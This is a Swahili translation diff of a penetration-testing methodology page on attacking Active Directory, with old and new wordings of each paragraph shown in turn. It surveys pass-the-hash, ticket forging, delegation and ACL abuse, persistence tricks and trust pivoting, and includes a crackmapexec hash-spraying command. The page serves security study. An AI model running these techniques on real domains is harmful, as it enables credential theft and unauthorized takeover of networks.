[**Soma ukurasa huu kuhusu njia tofauti za kupata hashes.**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
### Pass the Hash
**Mara utakapokuwa na hash ya mtumiaji**, unaweza kuitumia kumfanyia **impersonate**.\
Unahitaji kutumia zana itakayofanya **uthibitishaji wa NTLM ukitumia** hash hiyo, **au** unaweza kuunda sessionlogon mpya na **kuingiza** hash hiyo ndani ya LSASS, ili wakati wowote **uthibitishaji wa NTLM unafanyika**, hash hiyo itatumika. Chaguo la mwisho ndiyo mimikatz inafanya.\
[**Read this page for more information.**](../ntlm/index.html#pass-the-hash)
**Mara tu unapokuwa na hash ya mtumiaji**, unaweza kuitumia **impersonate** it.\
Unahitaji kutumia **tool** itakayefanya **NTLM authentication ikitumia** hiyo **hash**, **au** unaweza kuunda **sessionlogon** mpya na **inject** hiyo **hash** ndani ya **LSASS**, ili wakati wowote **NTLM authentication** itakapotendeka, hiyo **hash itatumika.** Chaguo la mwisho ndilo linalofanywa na mimikatz.\
[**Soma ukurasa huu kwa maelezo zaidi.**](../ntlm/index.html#pass-the-hash)
### Over Pass the Hash/Pass the Key
Shambulio hili linalenga **kutumia hash ya NTLM ya mtumiaji kuomba tiketi za Kerberos**, kama mbadala wa kawaida Pass The Hash juu ya protocol ya NTLM. Kwa hivyo, hili linaweza kuwa hasa **lenye matumizi kwenye mitandao ambapo protocol ya NTLM imezimwa** na **Kerberos pekee ndiyo inaruhusiwa** kama protocol ya uthibitishaji.
Shambulio hili linalenga **kutumia NTLM hash ya mtumiaji kuomba Kerberos tickets**, kama mbadala kwa Pass The Hash kawaida juu ya protocol ya NTLM. Hivyo, hii inaweza kuwa hasa **faa katika mitandao ambapo NTLM protocol imezimwa** na tu **Kerberos inaruhusiwa** kama protocol ya uthibitisho.
{{#ref}}
@ -270,7 +270,7 @@ over-pass-the-hash-pass-the-key.md
### Pass the Ticket
Katika njia ya shambulio ya **Pass The Ticket (PTT)**, wadukuzi **huiba tiketi ya uthibitishaji ya mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyoporwa kisha inatumika **kuiga mtumiaji**, kupata ufikiaji usioidhinishwa kwa rasilimali na huduma ndani ya mtandao.
Katika mbinu ya shambulio ya **Pass The Ticket (PTT)**, wavamizi **huiba tiketi ya uthibitisho ya mtumiaji** badala ya nenosiri au thamani za hash. Tiketi hii iliyochukuliwa kisha inatumika **impersonate** mtumiaji, kupata ufikiaji usioidhinishwa kwa rasilimali na huduma ndani ya mtandao.
{{#ref}}
@ -279,19 +279,19 @@ pass-the-ticket.md
### Credentials Reuse
Ikiwa una **hash** au **password** ya **local administrator** unapaswa kujaribu **kuingia locally** kwenye **PC nyingine** ukitumia hiyo.
Ikiwa una **hash** au **password** ya **local administrator** unapaswa kujaribu **login locally** kwenye **PCs** nyingine ukitumia hiyo.
```bash
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```
> [!WARNING]
> Kumbuka kwamba hii inasababisha **kelele nyingi** na **LAPS** ingepunguza hilo.
> Kumbuka kwamba hili ni **kelele** sana na **LAPS** lingepunguza hilo.
### MSSQL Abuse & Trusted Links
Iwapo mtumiaji ana ruhusa za **access MSSQL instances**, anaweza kuitumia kuweza **execute commands** kwenye mwenyeji wa MSSQL (ikiwa inaendesha kama SA), **steal** NetNTLM **hash** au hata kufanya **relay attack**.\
Pia, ikiwa MSSQL instance imewekwa kama trusted (database link) na instance tofauti ya MSSQL. Ikiwa mtumiaji ana ruhusa kwenye database iliyotumika, atakuwa na uwezo wa **use the trust relationship to execute queries also in the other instance**. Imani hizi zinaweza kuunganishwa mnyororo na kwa wakati fulani mtumiaji anaweza kupata database iliyopangwa vibaya ambako anaweza kuexecute commands.\
Ikiwa mtumiaji ana vibali vya **access MSSQL instances**, anaweza kutumia hilo kwa **execute commands** kwenye mwenyeji wa MSSQL (ikiwa inaendesha kama SA), **steal** NetNTLM **hash** au hata kufanya **relay** **attack**.\
Pia, ikiwa instance ya MSSQL inaaminika (database link) na instance tofauti ya MSSQL. Ikiwa mtumiaji ana vibali kwenye database iliyotumika kama trusted, atakuwa na uwezo wa **use the trust relationship to execute queries also in the other instance**. Hii trust zinaweza kuunganishwa mnyororo na katika hatua fulani mtumiaji anaweza kupata database iliyopangwa vibaya ambapo anaweza **execute commands**.\
**The links between databases work even across forest trusts.**
@ -301,7 +301,7 @@ abusing-ad-mssql.md
### IT asset/deployment platforms abuse
Suite za upande wa tatu za inventory na deployment mara nyingi zinaonyesha njia zenye nguvu kuelekea credentials na code execution. Angalia:
Suite za upande wa tatu za inventory na deployment mara nyingi zinaonyesha njia zenye nguvu za kupata credentials na code execution. Angalia:
{{#ref}}
sccm-management-point-relay-sql-policy-secrets.md
@ -313,9 +313,9 @@ lansweeper-security.md
### Unconstrained Delegation
Ikiwa utakuta Computer object yoyote yenye attribute [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) na una domain privileges kwenye kompyuta hiyo, utaweza dump TGTs kutoka kwenye memory ya watumiaji wote wanao login kwenye kompyuta.\
Hivyo, ikiwa **Domain Admin logins onto the computer**, utaweza dump TGT yake na kuimpersonate kwa kutumia [Pass the Ticket](pass-the-ticket.md).\
Shukrani kwa constrained delegation unaweza hata **automatically compromise a Print Server** (kwa bahati nzuri itakuwa DC).
Ikiwa unakuta Computer object yenye attribute [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) na una domain privileges kwenye kompyuta hiyo, utaweza dump TGTs kutoka memory ya watumiaji wote wanaoingia kwenye kompyuta hiyo.\
Kwa hiyo, ikiwa **Domain Admin** anaingia kwenye kompyuta, utaweza dump TGT yake na kumfanyia impersonate kwa kutumia [Pass the Ticket](pass-the-ticket.md).\
Shukrani kwa constrained delegation unaweza hata **automatically compromise a Print Server** (atumaini itakuwa DC).
{{#ref}}
@ -324,8 +324,9 @@ unconstrained-delegation.md
### Constrained Delegation
Ikiwa user au computer imekubaliwa kwa "Constrained Delegation" itakuwa na uwezo wa **impersonate any user to access some services in a computer**.\
Kisha, ikiwa utakapofanya **compromise the hash** ya user/computer hii utaweza **impersonate any user** (hata domain admins) kupata huduma fulani.
Ikiwa mtumiaji au kompyuta imeruhusiwa kwa "Constrained Delegation" itakuwa na uwezo wa **impersonate any user to access some services in a computer**.\
Kisha, ikiwa wewe **compromise the hash** ya mtumiaji/kompyuta hii utaweza **impersonate any user** (hata domain admins) kuingia kwenye baadhi ya services.
{{#ref}}
constrained-delegation.md
@ -333,7 +334,7 @@ constrained-delegation.md
### Resourced-based Constrain Delegation
Kuwa na ruhusa ya **WRITE** juu ya Active Directory object ya remote computer kunawawezesha kupata code execution kwa **elevated privileges**:
Kuwa na ruhusa ya **WRITE** kwenye Active Directory object ya kompyuta ya mbali kunaruhusu kupata code execution kwa **elevated privileges**:
{{#ref}}
@ -342,7 +343,7 @@ resource-based-constrained-delegation.md
### Permissions/ACLs Abuse
Mtumiaji aliyepatwa anaweza kuwa na baadhi ya **interesting privileges over some domain objects** ambazo zinaweza kuruhusu wewe **move** laterally/**escalate** privileges.
Mtumiaji aliyeverengwa anaweza kuwa na baadhi ya **interesting privileges over some domain objects** ambayo yanaweza kumruhusu **move** lateral/**escalate** privileges baadaye.
{{#ref}}
@ -351,7 +352,7 @@ acl-persistence-abuse/
### Printer Spooler service abuse
Kugundua **Spool service listening** ndani ya domain kunaweza kutumika **abused** ili **acquire new credentials** na **escalate privileges**.
Kupata **Spool service listening** ndani ya domain kunaweza **abused** ili **acquire new credentials** na **escalate privileges**.
{{#ref}}
@ -360,8 +361,8 @@ printers-spooler-service-abuse.md
### Third party sessions abuse
Ikiwa **other users** **access** the **compromised** machine, inawezekana **gather credentials from memory** na hata **inject beacons in their processes** ili kuimpersonate.\
Kwa kawaida watumiaji watafikia mfumo kupitia RDP, kwa hiyo hapa kuna jinsi ya kufanya baadhi ya attacks juu ya third party RDP sessions:
Ikiwa **other users** wana **access** kwenye **compromised** machine, inawezekana **gather credentials from memory** na hata **inject beacons in their processes** ili kuwao impersonate.\
Kawaida watumiaji wataingia mfumo kupitia RDP, hivyo hapa kuna jinsi ya kufanya baadhi ya mashambulizi juu ya sesi za RDP za watu wengine:
{{#ref}}
@ -370,7 +371,7 @@ rdp-sessions-abuse.md
### LAPS
**LAPS** inatoa mfumo wa kusimamia **local Administrator password** kwenye kompyuta zinazounganishwa na domain, kuhakikisha kuwa imekuwa **randomized**, ya kipekee, na mara kwa mara **changed**. Password hizi zimehifadhiwa ndani ya Active Directory na ufikiaji unadhibitiwa kupitia ACLs kwa watumiaji walioruhusiwa pekee. Ukiwa na permissions za kutosha za kuaccess password hizi, pivoting kwenda kwenye kompyuta nyingine kunawezekana.
**LAPS** hutoa mfumo wa kusimamia **local Administrator password** kwenye kompyuta zilizo joined kwenye domain, kuhakikisha ni **randomized**, ya kipekee, na hubadilishwa mara kwa mara. Nywila hizi zinahifadhiwa ndani ya Active Directory na ufikiaji zinafungiwa kupitia ACLs kwa watumiaji walioidhinishwa tu. Ukiwa na vibali vya kutosha vya kusoma nywila hizi, pivoting kwenda kompyuta nyingine inakuwa inawezekana.
{{#ref}}
@ -379,7 +380,7 @@ laps.md
### Certificate Theft
Kukusanya **certificates** kutoka kwa mashine iliyoporwa kunaweza kuwa njia ya kuescalate privileges ndani ya mazingira:
**Gathering certificates** kutoka kwenye mashine iliyoverengwa inaweza kuwa njia ya ku-escalate privileges ndani ya mazingira:
{{#ref}}
@ -388,7 +389,7 @@ ad-certificates/certificate-theft.md
### Certificate Templates Abuse
Ikiwa **vulnerable templates** zimesanidiwa inawezekana kuzitumia kwa **abuse** ili kuescalate privileges:
Ikiwa **vulnerable templates** zimewekwa inaweza kuzitumia ku-escalate privileges:
{{#ref}}
@ -399,7 +400,7 @@ ad-certificates/domain-escalation.md
### Dumping Domain Credentials
Mara tu unapopata **Domain Admin** au bora zaidi **Enterprise Admin** privileges, unaweza **dump** **domain database**: _ntds.dit_.
Mara baada ya kupata **Domain Admin** au bora zaidi **Enterprise Admin** privileges, unaweza **dump** **domain database**: _ntds.dit_.
[**More information about DCSync attack can be found here**](dcsync.md).
@ -407,7 +408,7 @@ Mara tu unapopata **Domain Admin** au bora zaidi **Enterprise Admin** privileges
### Privesc as Persistence
Baadhi ya techniques zilizojadiliwa hapo awali zinaweza kutumika kwa persistence.\
Baadhi ya mbinu zilizojadiliwa hapo juu zinaweza kutumika kwa persistence.\
Kwa mfano unaweza:
- Make users vulnerable to [**Kerberoast**](kerberoast.md)
@ -430,7 +431,7 @@ Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdenti
### Silver Ticket
The **Silver Ticket attack** inaunda legitimate Ticket Granting Service (TGS) ticket kwa huduma maalum kwa kutumia **NTLM hash** (kwa mfano, **hash ya PC account**). Mbinu hii inatumiwa kupata service privileges.
Shambulio la **Silver Ticket** linaunda **legitimate Ticket Granting Service (TGS) ticket** kwa huduma maalum kwa kutumia **NTLM hash** (kwa mfano, **hash ya PC account**). Njia hii inatumika kupata **access the service privileges**.
{{#ref}}
@ -439,9 +440,9 @@ silver-ticket.md
### Golden Ticket
A **Golden Ticket attack** inahusisha mshambuliaji kupata **NTLM hash ya krbtgt account** ndani ya Active Directory (AD). Akaunti hii ni maalum kwa sababu inatumiwa kusaini lahat TGTs (Ticket Granting Tickets), ambazo ni muhimu kwa uthibitisho ndani ya mtandao wa AD.
Shambulio la **Golden Ticket** linahusisha mdukuzi kupata **NTLM hash ya krbtgt account** katika mazingira ya Active Directory (AD). Akaunti hii ni maalum kwa sababu inatumika kusaini zote **Ticket Granting Tickets (TGTs)**, ambazo ni muhimu kwa authentication ndani ya mtandao wa AD.
Mara mshambuliaji anapopata hash hii, anaweza kuunda **TGTs** kwa akaunti yoyote anayotaka (Silver ticket attack).
Mara tu mdukuzi anapopata hash hii, anaweza kuunda **TGTs** kwa akaunti yoyote anayotaka (shambulio la Silver ticket).
{{#ref}}
@ -450,7 +451,7 @@ golden-ticket.md
### Diamond Ticket
Hizi ni kama golden tickets zilizofunguliwa kwa njia zinazoweza **bypass common golden tickets detection mechanisms.**
Hizi ni kama golden tickets lakini zinaufanywa kwa njia inayoweza **bypass common golden tickets detection mechanisms.**
{{#ref}}
@ -459,7 +460,7 @@ diamond-ticket.md
### **Certificates Account Persistence**
**Kuwa na certificates za akaunti au uwezo wa kuzi-request** ni njia nzuri ya kuweka persistence kwenye akaunti ya mtumiaji (hata kama anabadilisha password):
**Kuwa na certificates za akaunti au uwezo wa kuziomba** ni njia nzuri ya kukaa persist kwenye akaunti ya mtumiaji (hata kama anabadilisha password):
{{#ref}}
@ -468,7 +469,7 @@ ad-certificates/account-persistence.md
### **Certificates Domain Persistence**
**Kutumia certificates pia inaruhusu persistence kwa privileges za juu ndani ya domain:**
**Kutumia certificates pia inawezekana kuweka persistence kwa privileges za juu ndani ya domain:**
{{#ref}}
@ -477,13 +478,13 @@ ad-certificates/domain-persistence.md
### AdminSDHolder Group
The **AdminSDHolder** object katika Active Directory inahakikisha usalama wa **privileged groups** (kama Domain Admins na Enterprise Admins) kwa kutumia Access Control List (ACL) ya kawaida kwa vikundi hivi ili kuzuia mabadiliko yasiyoruhusiwa. Hata hivyo, kipengele hiki kinaweza kutumiwa vibaya; ikiwa mshambuliaji atabadilisha ACL ya AdminSDHolder ili kumpa mtumiaji wa kawaida ufikiaji kamili, mtumiaji huyo atapata udhibiti mpana juu ya vikundi vyote vya privileged. Kipengele hiki cha usalama, kilichokusudiwa kuwalinda, kinaweza hivyo kuleta matokeo mabaya isipokuwa kinadhibitiwa kwa karibu.
Kituo cha **AdminSDHolder** katika Active Directory kinahakikisha usalama wa **privileged groups** (kama Domain Admins na Enterprise Admins) kwa kutumia Access Control List (ACL) ya kawaida kwenye makundi haya ili kuzuia mabadiliko yasiyoruhusiwa. Hata hivyo, kipengele hiki kinaweza kutumika vibaya; ikiwa mdukuzi ata badilisha ACL ya AdminSDHolder kumpa mtumiaji wa kawaida ufikiaji kamili, mtumiaji huyo atapata udhibiti mkubwa juu ya makundi yote yaliyofaidika. Hatua hii ya usalama, iliyokusudiwa kulinda, inaweza hivyo kurejesha matokeo mabaya, kuruhusu ufikiaji usioidhinishwa isipokuwa ikifuatiliwa kwa karibu.
[**More information about AdminDSHolder Group here.**](privileged-groups-and-token-privileges.md#adminsdholder-group)
### DSRM Credentials
Katikati ya kila **Domain Controller (DC)**, kuna akaunti ya **local administrator**. Kwa kupata admin rights kwenye mashine kama hiyo, hash ya local Administrator inaweza kuchukuliwa kwa kutumia **mimikatz**. Baadaye, marekebisho ya registry yanahitajika ili **enable the use of this password**, kuruhusu ufikiaji wa mbali kwa akaunti ya local Administrator.
Katikati ya kila **Domain Controller (DC)**, kuna akaunti ya **local administrator**. Kwa kupata haki za admin kwenye mashine kama hiyo, hash ya Local Administrator inaweza kutolewa kwa kutumia **mimikatz**. Baadaye, mabadiliko kwenye registry ni muhimu ili **enable the use of this password**, kuruhusu ufikiaji wa mbali kwa akaunti ya Local Administrator.
{{#ref}}
@ -492,7 +493,7 @@ dsrm-credentials.md
### ACL Persistence
Unaweza **kumpa** baadhi ya **special permissions** mtumiaji juu ya baadhi ya domain objects maalum ambazo zitamruhusu mtumiaji **escalate privileges in the future**.
Unaweza **give** baadhi ya **special permissions** kwa **user** juu ya vitu maalum vya domain ambazo zitamruhusu mtumiaji **escalate privileges in the future**.
{{#ref}}
@ -501,7 +502,8 @@ acl-persistence-abuse/
### Security Descriptors
The **security descriptors** hutumika **kuhifadhi** **permissions** ambazo **object** ina juu ya kitu fulani. Ikiwa unaweza kufanya tu **mabadiliko madogo** kwenye **security descriptor** ya object, unaweza kupata privileges za kuvutia juu ya object hiyo bila kuwa mwanachama wa kikundi chenye vibali.
**security descriptors** zinatumika **kuhifadhi** **permissions** ambazo **object** ina **juu ya** object. Ikiwa unaweza kufanya **mabadiliko madogo** kwenye **security descriptor** ya object, unaweza kupata vibali vyenye faida juu ya object hiyo bila kuhitaji kuwa mwanachama wa kikundi chenye mamlaka.
{{#ref}}
security-descriptors.md
@ -509,7 +511,7 @@ security-descriptors.md
### Skeleton Key
Badilisha **LSASS** kwenye memory ili kuanzisha **neno la siri la ulimwengu wote (universal password)**, likiruhusu ufikiaji wa akaunti zote za domain.
Badilisha **LSASS** ndani ya memory ili kuweka **neno la siri la ulimwengu**, likiwa na ufikiaji wa akaunti zote za domain.
{{#ref}}
@ -519,7 +521,7 @@ skeleton-key.md
### Custom SSP
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/index.html#security-support-provider-interface-sspi)\
Unaweza kuunda SSP yako mwenyewe ili **capture** kwa **clear text** credentials zinazotumika kufikia mashine.
Unaweza kuunda **SSP** yako mwenyewe ili **capture** kwa **clear text** **credentials** zinazotumika kuingia kwenye mashine.
{{#ref}}
@ -528,8 +530,9 @@ custom-ssp.md
### DCShadow
Inarejesha kama **Domain Controller mpya** ndani ya AD na kulitumia kusukuma attributes (SIDHistory, SPNs...) kwa vitu vilivyotajwa **bila** kuacha **logs** kuhusu **modifications**. Unahitaji DA privileges na kuwa ndani ya **root domain**.\
Kumbuka kwamba ikiwa utatumia data zisizo sahihi, logs mbaya zitaonekana.
Inasajili **Domain Controller** mpya katika AD na kuitumia **push attributes** (SIDHistory, SPNs...) kwa vitu vilivyobainishwa **bila** kuacha **logs** kuhusu **mabadiliko**. Unahitaji DA privileges na kuwa ndani ya **root domain**.\
Kumbuka kuwa ikiwa utatumia data isiyo sahihi, logs mbaya zitajitokeza.
{{#ref}}
dcshadow.md
@ -537,71 +540,72 @@ dcshadow.md
### LAPS Persistence
Hapo awali tumependekeza jinsi ya kuescalate privileges ikiwa una **permission za kutosha kusoma LAPS passwords**. Hata hivyo, password hizi pia zinaweza kutumika kuendelea kuwa na persistence.\
Hapo awali tumetoa jinsi ya ku-escalate privileges ikiwa una **enough permission to read LAPS passwords**. Hata hivyo, nywila hizi zinaweza pia kutumika kwa **maintain persistence**.\
Angalia:
{{#ref}}
laps.md
{{#endref}}
## Forest Privilege Escalation - Domain Trusts
Microsoft inaona **Forest** kama mipaka ya usalama. Hii ina maana kwamba **kuharibu domain moja kunaweza kusababisha Forest nzima kuathiriwa**.
Microsoft inaona **Forest** kama mpaka wa usalama. Hii ina maana kwamba **kuathiri domain moja kunaweza kusababisha kuathiri Forest yote**.
### Basic Information
A [**domain trust**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>) ni mfumo wa usalama unaomruhusu mtumiaji kutoka **domain** moja kufikia rasilimali katika **domain** nyingine. Kwa msingi huo inaunda uunganisho kati ya mifumo ya uthibitisho ya domain zote mbili, ikiruhusu uhakiki wa uthibitisho kuendelea kwa urahisi. Wakati domain zinapounda trust, zinabadilisha na kuhifadhi funguo maalum ndani ya **Domain Controllers (DCs)**, ambazo ni muhimu kwa uadilifu wa trust.
[**domain trust**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>) ni mfumo wa usalama unaowezesha mtumiaji kutoka **domain** moja kupata rasilimali katika **domain** nyingine. Inaunda muunganiko kati ya mifumo ya authentication ya domains mbili, ikiruhusu uhakiki wa authentication kuendelea kwa urahisi. Wakati domains zinaweka trust, zinabadilisha na kuweka maalum **keys** ndani ya **Domain Controllers (DCs)** zao, ambazo ni muhimu kwa uaminifu wa trust.
Katika hali ya kawaida, ikiwa mtumiaji anataka kufikia service katika **trusted domain**, awali lazima aombe ticket maalum inayoitwa **inter-realm TGT** kutoka kwa DC ya domain yao. TGT hii imekryptiwa kwa **trust key** ambayo domain zote mbili zimekubaliana. Mtumiaji kisha aniwasilisha inter-realm TGT hii kwa **DC ya trusted domain** ili kupata service ticket (**TGS**). Baada ya DC ya trusted domain kuthibitisha inter-realm TGT kwa kutumia trust key yao na ikiwa ni sahihi, itatoa TGS, ikimpa mtumiaji ufikiaji wa service.
Katika matukio ya kawaida, ikiwa mtumiaji anataka kupata huduma katika **trusted domain**, lazima kwanza aombe ticket maalum inayoitwa **inter-realm TGT** kutoka DC ya domain yake. TGT hii imefungwa kwa **key** iliyoshirikiwa ambayo domains zote mbili zimekubaliana. Mtumiaji kisha anatumia inter-realm TGT hii kwa **DC ya trusted domain** kupata service ticket (**TGS**). Baada ya inter-realm TGT kuthibitishwa na DC ya trusted domain, itatoa TGS, ikimpa mtumiaji ufikiaji wa huduma.
**Steps**:
1. A **client computer** katika **Domain 1** inaanza mchakato kwa kutumia **NTLM hash** yake kuomba **Ticket Granting Ticket (TGT)** kutoka kwa **Domain Controller (DC1)**.
2. DC1 hutolewa TGT mpya ikiwa client imethibitishwa kwa mafanikio.
3. Client kisha inaomba **inter-realm TGT** kutoka DC1, ambayo inahitajika kufikia rasilimali katika **Domain 2**.
4. Inter-realm TGT imekryptiwa kwa **trust key** iliyoshirikiwa kati ya DC1 na DC2 kama sehemu ya two-way domain trust.
5. Client inabeba inter-realm TGT kwenda kwa **Domain 2's Domain Controller (DC2)**.
6. DC2 inathibitisha inter-realm TGT kwa kutumia shared trust key na, ikiwa sahihi, inatoa **Ticket Granting Service (TGS)** kwa server katika Domain 2 ambayo client anataka kufikia.
7. Mwishowe, client inawasilisha TGS hii kwa server, ambayo imekryptiwa na hash ya akaunti ya server, ili kupata ufikiaji wa service katika Domain 2.
1. Kompyuta ya **client** katika **Domain 1** inaanzisha mchakato kwa kutumia **NTLM hash** yake kuomba **Ticket Granting Ticket (TGT)** kutoka kwa **Domain Controller (DC1)**.
2. DC1 hutoa TGT mpya ikiwa client imefanikiwa kuthibitishwa.
3. Kisha client inamuomba **inter-realm TGT** kutoka DC1, ambayo inahitajika ili kupata rasilimali katika **Domain 2**.
4. Inter-realm TGT imefungwa kwa **trust key** iliyoshirikiwa kati ya DC1 na DC2 kama sehemu ya trust ya mwelekeo wa pande mbili.
5. Client inachukua inter-realm TGT kwenda kwa **Domain 2's Domain Controller (DC2)**.
6. DC2 inathibitisha inter-realm TGT kwa kutumia trust key iliyoshirikiwa na, ikiwa ni halali, hutoa **Ticket Granting Service (TGS)** kwa server katika Domain 2 ambayo client anataka kufikia.
7. Mwishowe, client inawasilisha TGS hii kwa server, ambayo imefungwa kwa hash ya account ya server, ili kupata ufikiaji wa huduma katika Domain 2.
### Different trusts
Ni muhimu kutambua kwamba **trust inaweza kuwa one way au two ways**. Katika uchaguzi wa two ways, domain zote mbili zitakuwa zinamtumaini kila mmoja, lakini katika uhusiano wa **one way** moja ya domain itakuwa **trusted** na nyingine itakuwa **trusting** domain. Katika kesi ya mwisho, **utakuwa na uwezo wa kufikia rasilimali ndani ya trusting domain kutoka trusted domain pekee**.
Ni muhimu kutambua kwamba **trust inaweza kuwa 1 way au 2 ways**. Katika chaguo la 2 ways, domains zote mbili zitakuwa zinaaminiana, lakini katika uhusiano wa **1 way** moja ya domains itakuwa **trusted** na nyingine itakuwa **trusting** domain. Katika kesi ya mwisho, **utakuwa na uwezo wa kupata rasilimali ndani ya trusting domain kutoka trusted domain tu**.
Iwapo Domain A inamtumaini Domain B, A ni trusting domain na B ni trusted. Zaidi ya hayo, katika **Domain A**, hii itakuwa **Outbound trust**; na katika **Domain B**, hii itakuwa **Inbound trust**.
Ikiwa Domain A inamtumaini Domain B, A ndiye trusting domain na B ndiye trusted. Zaidi ya hayo, katika **Domain A**, hii itakuwa **Outbound trust**; na katika **Domain B**, hii itakuwa **Inbound trust**.
**Different trusting relationships**
- **Parent-Child Trusts**: Hili ni mpangilio wa kawaida ndani ya forest ileile, ambapo child domain kwa kawaida ina two-way transitive trust na parent domain yake. Kwa kifupi, hii inamaanisha kwamba maombi ya uthibitisho yanaweza kusafiri kwa urahisi kati ya parent na child.
- **Cross-link Trusts**: Zinajulikana kama "shortcut trusts," hizi zinatengwa kati ya child domains ili kuharakisha mchakato wa referral. Katika forests tata, referrals za uthibitisho kwa kawaida zinahitaji kusafiri hadi root ya forest kisha kushuka hadi domain inayolengwa. Kwa kuunda cross-links, safari inafupishwa, jambo lenye manufaa katika mazingira yaliyotawanyika kijiografia.
- **External Trusts**: Hizi zimeratibiwa kati ya domains tofauti, zisizohusiana na ni non-transitive kwa asili. Kulingana na [Microsoft's documentation](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>), external trusts zinatumika kufikia rasilimali katika domain nje ya current forest ambayo haijumuishwaji na forest trust. Usalama unaimarishwa kupitia SID filtering kwa external trusts.
- **Tree-root Trusts**: Trusts hizi zinaanzishwa moja kwa moja kati ya forest root domain na tree root mpya iliyoongezwa. Ingawa hazikufunuliwa sana, tree-root trusts ni muhimu kwa kuongeza miti mipya ya domain kwenye forest, zikiruhusu kudumisha jina la domain la kipekee na kuhakikisha two-way transitivity. Taarifa zaidi inaweza kupatikana katika [Microsoft's guide](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>).
- **Forest Trusts**: Aina hii ya trust ni two-way transitive trust kati ya forest root domains mbili, pia ikitekeleza SID filtering ili kuongeza hatua za usalama.
- **MIT Trusts**: Trusts hizi zinaanzishwa na non-Windows, [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domains. MIT trusts ni maalum zaidi na zinahudumia mazingira yanayohitaji ushirikiano na mifumo ya Kerberos nje ya ekosistimu ya Windows.
- **Parent-Child Trusts**: Hii ni mpangilio wa kawaida ndani ya forest hiyo hiyo, ambapo child domain ina automatisch two-way transitive trust na parent domain. Hii inamaanisha kuwa maombi ya authentication yanaweza kusafiri kwa urahisi kati ya parent na child.
- **Cross-link Trusts**: Zinajulikana kama "shortcut trusts," zinaundwa kati ya child domains ili kuharakisha mchakato wa marejeo. Katika forests tata, marejeo ya authentication kawaida yanapaswa kusafiri hadi kwenye mizizi ya forest kisha kushuka hadi domain lengwa. Kwa kuunda cross-links, safari hiyo inafupishwa, jambo lenye faida hasa katika mazingira yaliyoenea kimwili.
- **External Trusts**: Hizi zimeanzishwa kati ya domains tofauti, zisizo na uhusiano na kwa asili si transitive. Kulingana na [Microsoft's documentation](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>), external trusts ni muhimu kwa kupata rasilimali katika domain nje ya forest ya sasa ambayo haijabunganishwa kwa forest trust. Usalama unaboreshwa kupitia SID filtering kwa external trusts.
- **Tree-root Trusts**: Trusts hizi zinaanzishwa moja kwa moja kati ya forest root domain na tree root mpya iliyoongezwa. Ingawa hazionekani mara kwa mara, tree-root trusts ni muhimu kwa kuongeza miti mpya ya domain kwenye forest, zikiruhusu kudumisha jina la kipekee la domain na kuhakikisha transitivity ya pande mbili. Maelezo zaidi yanapatikana katika [Microsoft's guide](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>).
- **Forest Trusts**: Aina hii ya trust ni two-way transitive trust kati ya forest root domains mbili, na pia inatekeleza SID filtering ili kuongeza hatua za usalama.
- **MIT Trusts**: Trusts hizi zinaanzishwa na domains za Kerberos zisizo za Windows, zinazoendana na [RFC4120](https://tools.ietf.org/html/rfc4120). MIT trusts ni maalum zaidi na zinahudumia mazingira yanayohitaji ujumuishaji na mifumo ya Kerberos nje ya ekosistimu ya Windows.
#### Other differences in **trusting relationships**
- Uhusiano wa trust unaweza pia kuwa **transitive** (A trust B, B trust C, basi A trust C) au **non-transitive**.
- Uhusiano wa trust unaweza kuwekwa kama **bidirectional trust** (pande zote zinatumiani) au kama **one-way trust** (moja tu inamtumaini mwingine).
- Uhusiano wa trust pia unaweza kuwa **transitive** (A trust B, B trust C, basi A trust C) au **non-transitive**.
- Uhusiano wa trust unaweza kuwekwa kama **bidirectional trust** (pande zote zinaaminiana) au kama **one-way trust** (mmoja tu anamtumaini mwingine).
### Attack Path
1. **Enumerate** uhusiano wa trusting
2. Angalia ikiwa kuna **security principal** (user/group/computer) ambaye ana **access** kwa rasilimali za **domain nyingine**, labda kupitia ACE entries au kwa kuwa katika vikundi vya domain nyingine. Tafuta **relationships across domains** (trust ilianzishwa kwa ajili ya hili pengine).
1. kerberoast katika kesi hii inaweza kuwa chaguo nyingine.
2. Angalia kama kuna **security principal** (user/group/computer) ana **access** kwa rasilimali za **domain nyingine**, labda kupitia ACE entries au kwa kuwa katika vikundi vya domain nyingine. Angalia **relationships across domains** (trust ilianzishwa kwa madhumuni haya huenda).
1. kerberoast katika hali hii inaweza kuwa chaguo lingine.
3. **Compromise** akaunti ambazo zinaweza **pivot** kupitia domains.
Wavamizi wanaweza kupata ufikiaji wa rasilimali katika domain nyingine kupitia njia kuu tatu:
Washambuliaji wanaweza kupata ufikiaji wa rasilimali katika domain nyingine kupitia mekanisimu tatu kuu:
- **Local Group Membership**: Principals wanaweza kuongezwa kwenye vikundi vya local kwenye mashine, kama “Administrators” group kwenye server, ikiwapa udhibiti mkubwa wa mashine hiyo.
- **Foreign Domain Group Membership**: Principals pia wanaweza kuwa wanachama wa vikundi ndani ya foreign domain. Hata hivyo, ufanisi wa njia hii unategemea aina ya trust na eneo la kikundi.
- **Access Control Lists (ACLs)**: Principals wanaweza kutajwa katika **ACL**, hasa kama entities katika **ACEs** ndani ya **DACL**, wakiwapa ufikiaji wa rasilimali maalum. Kwa wale wanaotaka kujifunza kwa undani mechanics za ACLs, DACLs, na ACEs, whitepaper iliyoitwa “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” ni rasilimali muhimu.
